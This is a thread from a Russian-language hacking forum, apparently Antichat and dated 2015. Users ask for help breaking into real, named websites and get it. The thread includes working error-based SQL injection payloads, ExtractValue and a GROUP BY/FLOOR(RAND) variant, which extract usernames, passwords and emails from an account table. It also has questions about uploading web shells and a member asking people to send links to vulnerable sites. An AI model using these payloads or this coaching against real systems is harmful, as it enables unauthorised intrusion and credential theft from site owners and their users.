HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 11.06.2015, 16:59
AndreyBerkut
Guest
Сообщений: n/a
Провел на форуме:
1354

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:

Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
через union? Он, там тоже не работает, поскольку запрос выглядит примерно так:

INSERT INTO account VALUES (username,password,email);

И вроде как, union работает только на Select, или я ошибаюсь?

Вообще, вот уязвимый сайт, который пытаюсь взломать... http://wow.kwinta.net/index.php?id=registration.html

Уязвимо поле ввода имени аккаунта...
 
Ответить с цитированием

  #192  
Старый 11.06.2015, 17:15
AndreyBerkut
Guest
Сообщений: n/a
Провел на форуме:
1354

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

YaBtr про вектор group by
как бы я не пытался его сунуть, появляется ошибка You have an error in your SQL syntax...

Не подскажете, как в моем случае его нужно правильно применять?
 
Ответить с цитированием

  #193  
Старый 11.06.2015, 17:24
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Вы сами написали вектор вывода для версии, далее все по аналогии.
 
Ответить с цитированием

  #194  
Старый 11.06.2015, 17:56
AndreyBerkut
Guest
Сообщений: n/a
Провел на форуме:
1354

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:

Вы сами написали вектор вывода для версии, далее все по аналогии.
Всё понял, получилось, спасибо

Еще вопрос: реально ли залить шелл через эту уязвимость?
 
Ответить с цитированием

  #195  
Старый 11.06.2015, 18:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от AndreyBerkut  
AndreyBerkut said:

Всё понял, получилось, спасибо
Еще вопрос: реально ли залить шелл через эту уязвимость?
/threads/43966/
 
Ответить с цитированием

  #196  
Старый 11.06.2015, 20:00
HelpMeS
Guest
Сообщений: n/a
Провел на форуме:
237

Репутация: 0
По умолчанию

Возможно залить сюда шелл? http://www.printclick.ru/userupload.html?ident=1 фильтрацыя неособая. мне ума нехватает. обясните пожалуста.
 
Ответить с цитированием

  #197  
Старый 11.06.2015, 21:35
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

 
Ответить с цитированием

  #198  
Старый 13.06.2015, 11:40
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от AndreyBerkut  
AndreyBerkut said:

Хелп плз
при попытке выполнить
25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1
появляется ошибка
Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции
ExtractValue.
Какие есть альтернативы?
P.S.

25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log

'
 
Ответить с цитированием

  #199  
Старый 13.06.2015, 13:06
Hassle
Guest
Сообщений: n/a
Провел на форуме:
577

Репутация: 0
По умолчанию

всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно..

сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня?

я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...

 
Ответить с цитированием

  #200  
Старый 13.06.2015, 13:45
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Цитата:
Сообщение от Hassle  
Hassle said:

всем привет, 2 года пытаюсь взломать нужные мне сайты, но все тщетно..
сегодня ночью прогонял один сайт через Acunetix, выдало вот такие алерты, можно ли их как-то поюзать или фигня?
я давно не затрагивал инъекции и поэтому позабыл уже что и как, на сайте фильтруется запрос " ' " и выползает на его месте %27...

вероятно есть скуля в форме регистрации, скидывай ссылку)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ